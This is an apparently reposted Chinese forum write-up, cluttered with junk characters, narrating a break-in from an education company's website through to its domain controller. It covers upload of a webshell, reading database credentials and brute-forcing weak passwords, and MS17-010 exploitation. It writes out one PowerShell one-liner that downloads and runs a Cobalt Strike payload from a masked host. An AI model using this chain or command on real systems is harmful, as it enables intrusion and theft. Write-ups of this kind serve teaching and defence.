|
' i/ D7 y5 {' N2 l9 \" }$ O8 c 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路5 ]& j& M/ W9 L& o4 k; e4 u4 t. M9 a% m* k
/ G7 C* p/ M: m/ I; h# C/ G
9 x3 J1 F" j" s 9 _6 q* w7 v$ v( I6 x
) T: @, b8 L& A
. G: v- D; {; ~7 `& O 正文
8 v; V( U1 o4 n- e$ { & }( X+ r6 l" t+ s# W
' k+ A: {) t* d" z# w3 t1 X
- n1 ^$ _+ O) J/ Q
: F$ c# Y% V8 }& t5 v7 c G& }: s- B# c w6 b2 A
目标:www.xxxx.com(一家教育机构)
; P8 N6 @2 F% w打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能: Z( j V" R* }
$ `7 |8 H( @9 k
P1 b1 U1 a E5 G3 e 
9 S x' V* p$ a9 H: t1 J' _7 y ( Y. ~. e$ p' L* X
/ d, `, W6 v, U4 A 进行了简单的信息搜集
$ T: m8 ~' T' c. H# z* a& @5 |
/ k( U' E4 ]; S! q& _4 z
& X: l3 D" E% v8 t0 W: x
" a& Q/ ~3 X' _+ w. }6 j
; h+ K2 x% F- g5 N( i# P 子域名搜集
! } O [0 k. a3 ?: ^6 P 3 H; ^ J% g1 v1 _3 F2 w
" p S1 ]' g3 q0 j7 v9 _( a5 R+ X% p5 A
 $ w- g# [1 ]. P
3 |, Z& q: e0 T" w, N9 O/ C i( W
% [& T% B% |! s( _ fofa找资产
6 p2 W- r: z; f, ]
3 [" H' N) o, P9 l
y$ \6 _! ~; y4 C+ _# I / U" P! x- n. V5 F
' y- D) {5 k$ f/ T6 h9 L3 \( U  . Q/ J* d& D a" x4 L U2 Q: i
8 C9 l6 s6 ^# y: w4 M4 h; Q, X+ r0 G2 _; ^6 x
一共七个资产。去重之后只有两个。
7 n; ?% a8 }! i B" I* j
' n- }& r$ E1 M# G' d' }* M4 f1 g. c/ H5 C5 i
4 _4 Z6 F' z5 `; k) r$ a! L0 E( t/ K. D- V2 z E( n v, G
目录探测* t; n) L' M+ Q
* u8 ~# B: X5 t% D
/ P, A* f. S7 k# \. G: i
$ a, q% F" X, {# C9 K$ i$ ~ ( f e8 x: ~6 {; |4 K8 r
' t. U" S6 v! Q& Y3 x
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
+ Q( m$ b7 e. Z
T, Y) c5 q% N7 b- t- g5 \0 E9 V% g" v1 R, R( f
( C* }. H7 e) L! E3 s
; N4 G3 |" ?0 J- A. G6 I. q, F 我又尝试了通过修改返回包来绕过登录界面( H4 U# O7 g; I5 U& K6 K+ e! ]
* d/ s& M4 r3 U, f
+ g- _* J$ w. R( [% \ B
0 W6 Y& P# U9 H k
) c# d; {2 h @# j5 @5 Z2 q1 J! ]& i% W) L5 N% N( X
还是不行,尝试注入无果
6 }: L- k. D8 s& }
8 Y! ?4 g- U* m3 m; h( H/ I, S9 y( \
; K1 c2 H" f& s! J$ h5 M7 o
) }4 n! ?. d& q2 C+ D( x8 M9 ?! \9 g1 \+ c. n3 f- G% m t/ G
不过我目录探测出了一处Spring信息泄露
+ G% Q7 V4 Q3 m: R6 H! m$ c
7 F& v" i& S4 W r; d, X6 Z0 f* l1 L0 W8 B5 d, o+ O2 i# b
/ |) n! a# [1 m- C+ R
3 I3 E/ L- ]6 q8 f; z( l- l7 @1 p
4 K% ]& k: Q# ]& K! P6 o% A 7 ?* H8 h* ~% ~2 T! C/ I
7 i) Q4 m- a: C
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录" C9 u0 N& Q) N
8 \1 P* R K% [# b; m" [2 ]5 A
9 Z# X- H0 E4 U: G Q# a6 D 
+ ^9 N1 u. r! l4 t C3 j5 T+ s6 ?2 d
6 A+ b0 G4 h4 U8 r$ S0 Z 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。3 m4 }' R5 f( t8 b
: @2 V! W2 E- W/ p& i* X9 c
# x7 [, n8 _' |& L R3 U4 _  " r6 K' i. ~* A+ a: e4 g( J
4 _- x; {; g( o- l. n' p. z
* P0 x0 G' g/ |6 r1 a5 A# k' @
获取有些师傅到这一步就手机抓包电脑测了。) E8 W3 C2 B9 }. r) k' I
& }4 N! y4 g |5 @% c8 L
7 _' Z- N: L; G N
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
) ^6 Z. S% Z% v, r1 P( Z
. |6 P. ~0 x8 i) ^
/ B; X8 p. Z3 `, e 其中在一个公众号发现了小程序,可以进行注册。4 P0 n9 ^2 Q7 d9 e* `5 T) ?1 ^8 ^4 r
& ]4 R$ ? h j7 t
6 c W! b S/ e
看到了头像上传,尝试上传获取WebShell: T0 b; G r& j/ j+ K) B
- ?7 S8 I2 E. I4 j* E- g
! f5 Z2 T# |' p) A8 u
- r8 |& q' L* c; j& o
5 W2 P+ ~7 `, V- F% ~, o+ Y+ U E2 a: V% q5 `* \
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问4 f/ D+ g& X9 P$ t0 M
6 A) F& `' T) Q- |: d
' j3 x# F6 }' G8 F8 J 
. ?* Q( C7 M, l9 ?/ I2 Z8 R: P8 l # B. y& b: Q4 F2 z9 p) c. c
/ I4 [( Z' L4 T6 C 然后上了大马; T$ |# Z( L8 T T
% b1 G) D/ o. r) B( Q6 [: X+ e3 y
9 e9 b% X$ J6 q 
6 M0 s+ D) y# P3 p2 K1 q1 c ) U+ H; X% y$ c( U D% z& p1 v1 S8 [
* r( G1 Z) d& J; v. o
 / E4 u9 ~4 n* o: ]
( Q9 V4 }+ C- n% E, l9 j9 y, i1 M
) R B5 y4 e9 k( y' g8 h3 g 通过翻找文件发现数据库账号密码" i6 F4 L0 B: e6 A
+ H0 k+ z. v m9 p# [6 I
$ V: I. a& H- x5 [5 m  # t8 Y+ u$ L p7 M2 g
2 b8 E7 q1 D8 t$ q& w2 \1 g
( G% M3 Q- z9 C# y: V2 S/ Q7 U. C& p
--内网渗透# _5 E# W8 n4 C- O0 ]
# T# `- e A$ z" z% T4 j" ~+ A" f( S1 s8 U! p
直接通过powershell执行 cs上线8 M! s+ p9 u/ V+ T
5 }. q, ]4 n6 Q$ S
5 b, G( V) K" r( K" B
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"2 @. n- ~! D0 N. w/ Q, Z
; Z" ]+ h" P& {9 K0 n1 I" c3 p) G8 n. X
 1 X$ t9 E' M$ o* E0 M+ ]0 |
# }2 U$ y3 S2 O
/ X. O$ r9 t1 }! t! V
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破1 s" S- W1 b4 e$ ]+ n/ Q1 E2 p1 |8 j
o7 O' N' ~& ~0 s$ m1 g& s: i- B& H2 I" n4 s* d+ D7 g3 i( J
4 [( T% s9 @+ W: | ' P' ?/ F3 e' L
' P1 F( U, }( O* N4 H
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
) z3 T2 V) I& S- [# K- T% c# k
6 a6 O5 x. M' ?# W. X
$ c% s# N. G' L0 H$ q
& E7 {6 I. ^; F1 b* |
( q, [& q& ~9 W i1 [1 H8 _" P! v3 T$ Z/ c' X) X8 R0 b5 m" u7 t
. ]+ e' ?/ v5 q
& ~- y9 {: x4 `9 p j% b4 ~5 @4 C& H% r$ s
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
& V+ ]2 G1 Z) \' N0 s
2 }; z2 J! l! k( v+ V) l
' F( m# O+ W! u3 n, Q8 {, U . C% B% r) G( s; Z- d
8 a" H1 k! v: K
8 Y8 z4 V. v( y" x4 ]7 \5 B8 b F& f8 C) w( _1 x F0 j
1 f z/ k, c$ A( a6 W' a" d
% A0 S# P: J& k2 @
" w: |6 A U7 t! o
# J% K n* I: C6 O2 n4 l: K+ G# g
! ]! Z6 b+ Z2 r) l
% N( p& S' a& P 7 i* t0 }- r7 o; \) }) r7 k; B
3 U$ M7 b, R7 Z* H
$ E8 ~2 Q( W# ~& G: M( z 小结: C& K" I) N, M
9 y% `7 L- j" [; e# _% Y- F& f9 ?
/ Z: h- J5 K' T' S. N
" q5 {4 d+ j% R: e$ e . ?2 k" W( q3 ?$ t/ W
3 b; E' S8 H" R/ ~ 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!' E( A% ~* ?; J- B( r
) ^7 d- d: l: s' O. D7 O6 ^+ r! [
4 }% Q) W" B3 M5 Q+ h
1 `/ Z8 L% F% [3 { % a# ]' [7 Q7 m
3 |. |( A" k$ F# w+ I b3 Q$ D" M1 b
-
/ C! a4 @5 M- d9 R# L2 N + N' n4 n u1 G- @. }' I# b6 N
6 R# b$ A2 B: ~- W# k% g7 S - $ M( c1 T9 }3 z
, `1 o# X' D+ E ~" U% W* A
. u ]# X# R: O+ j 7 T; C- y* ^: X
# Z$ g2 y6 P% ?3 R- U
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
4 j2 _9 h# B0 Z ' K$ v' Q. ^8 u1 S
6 J8 l+ C* }0 o. A. `- s8 W
8 E, C% b1 y6 x$ l, K7 F1 g! r4 k0 V. }
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对